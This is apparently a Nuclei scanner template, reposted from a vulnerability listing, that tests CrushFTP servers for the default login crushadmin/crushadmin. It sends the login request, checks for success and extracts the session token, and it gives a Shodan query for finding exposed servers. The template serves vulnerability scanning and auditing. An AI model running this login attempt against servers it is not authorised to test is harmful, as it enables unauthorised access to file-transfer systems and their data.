漏洞描述
CrushFTP default login credentials were discovered.
crushftp-default-login: CrushFTP - Default Login
PoC代码[已公开]
id: crushftp-default-login
info:
name: CrushFTP - Default Login
author: pussycat0x
severity: high
description: |
CrushFTP default login credentials were discovered.
classification:
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: crushftp
product: crushftp
shodan-query: html:"CrushFTP"
tags: default-login,crushftp,vuln
http:
- raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/WebInterface/login.html
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
attack: pitchfork
payloads:
username:
- crushadmin
password:
- crushadmin
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "<response>success</response>"
- type: word
part: header_2
words:
- "text/xml"
extractors:
- type: regex
name: auth
internal: true
part: header_2
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
# digest: 4b0a00483046022100b7fc9f1cf93c2450ca47ac0f65da59abcdce642eebc9baf3897938568e20b64b022100ba9cc8ca3850d04a4296d7fef2c37c5d15b8c0534935ae563b214b5952b35ee2:922c64590222798bb761d5b6d8e72950